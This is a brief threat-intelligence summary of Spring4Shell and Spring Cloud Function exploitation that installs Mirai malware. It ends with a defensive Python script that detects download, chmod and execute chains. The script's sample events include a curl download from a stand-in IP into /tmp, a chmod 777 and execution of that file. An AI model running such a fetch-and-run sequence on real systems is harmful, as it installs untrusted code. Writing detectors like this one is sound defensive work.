2022-04-13

Spring Exploits

Level: Tactical | Source: Trend Micro
Technology


Trend Micro researchers have been tracking exploits for Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Function (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a webshell and use it to download Mirai botnet malware. The downloaded malware's permissions are then changed with chmod, and it is executed. Lastly, a shell script runs to download binaries from an attacker-owned server, to install compatible versions of Mirai samples, built for different CPU architectures, onto the victim host.
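For defenders, the download, chmod, execute sequence described above can be correlated per host and file path in process-creation telemetry. The sketch below is an added example, not code from Trend Micro or Anvilogic; the event format, host names, paths, URLs and the curl/wget tool names are assumptions, since the brief does not name the download tool.

```python
import re
import shlex

# Assumption: download tools and their output-file flags (the brief names no tool).
DOWNLOADERS = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}

# Constructed process-creation events: (host, parent process, command line).
SAMPLE_EVENTS = [
    ("web01", "java", "curl -o /tmp/upd http://198.51.100.7/upd"),
    ("web01", "java", "chmod 777 /tmp/upd"),
    ("web01", "java", "/tmp/upd"),
    ("web02", "bash", "wget -O /opt/tool/agent https://example.com/agent"),
    ("web02", "bash", "chmod 644 /opt/tool/agent"),
    ("web03", "sh", "chmod +x /usr/local/bin/backup.sh"),
    ("web03", "sh", "/usr/local/bin/backup.sh"),
]

def grants_exec(mode):
    """True if a chmod mode argument sets an execute bit (octal or symbolic)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return re.search(r"[+=][rwXst]*x", mode) is not None

def detect_chain(events):
    """Alert when one file on one host is downloaded, made executable, then run."""
    stage = {}   # (host, path) -> "downloaded" | "executable"
    alerts = []
    for host, parent, cmdline in events:
        argv = shlex.split(cmdline)
        if not argv:
            continue
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in DOWNLOADERS:
            for flag in DOWNLOADERS[tool]:
                if flag in argv[:-1]:
                    stage[(host, argv[argv.index(flag) + 1])] = "downloaded"
        elif tool == "chmod" and len(argv) >= 3 and grants_exec(argv[1]):
            for path in argv[2:]:
                if stage.get((host, path)) == "downloaded":
                    stage[(host, path)] = "executable"
        else:
            # Direct execution, or an interpreter given the path as first argument.
            for arg in argv[:2]:
                if stage.get((host, arg)) == "executable":
                    alerts.append({"host": host, "path": arg, "parent": parent})
    return alerts

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The parent process is carried into the alert so that chains spawned by a Java application server can be triaged first.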
